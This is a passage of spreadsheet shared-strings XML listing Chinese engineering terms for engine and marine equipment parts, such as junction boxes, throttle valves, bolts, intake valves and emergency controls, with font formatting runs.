      </rPr>
      <t>接线板部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线端子</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线附件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线盒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线盒</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线盒布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线盒和线路布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线箱布置</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线箱和电缆桥架的布置</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线原理图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接长杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节距控制头局部加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流板螺钉固定</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流插芯安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流阀衬垫的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流阀的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流阀的促动器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流阀杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流阀螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流孔丝堵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流螺钉</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1/5</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节油器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节油箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>结构部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截断滑阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截流阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截流阀装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截流管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截止阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截止阀测试工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截止阀用适配接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>金属槽</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>筋板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧定螺钉</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧固螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧固螺栓和轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧固螺栓质量规程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧固数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧固说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧固装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧急备用电力装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧急备用电力装置尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧急操作说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧急电话盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧急电话箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧急换向工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧急控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧急控制锤子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧急控制盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧急螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧急情况</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧急手柄</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧急锁定装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧急停车</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧急运行箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧急运行轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧配螺栓</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧配螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧配螺栓安装</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧配螺栓安装生产建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧配螺栓最少数目</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧线钳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形接头滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进港后操作</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进港前准备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进给控制止推片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口导管交叉部分</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口法兰组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口管，截面</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口管横截面</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口和排气阀检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口空冷器出口恒温阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口凸轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口凸轮样板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口弯头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进气阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进气阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀弹簧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进气阀壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进气阀研磨杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进气阀座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进气管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进气凸轮，轮廓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进气凸轮样板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进气消音器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进油弯管上紧样板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>近位探测仪布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>经济调查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>精加工飞轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>颈环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>颈螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>颈轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>颈轴承白合金</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>警报器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>警报信号</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>警告</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>警告</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>警告板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>径向承磨环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
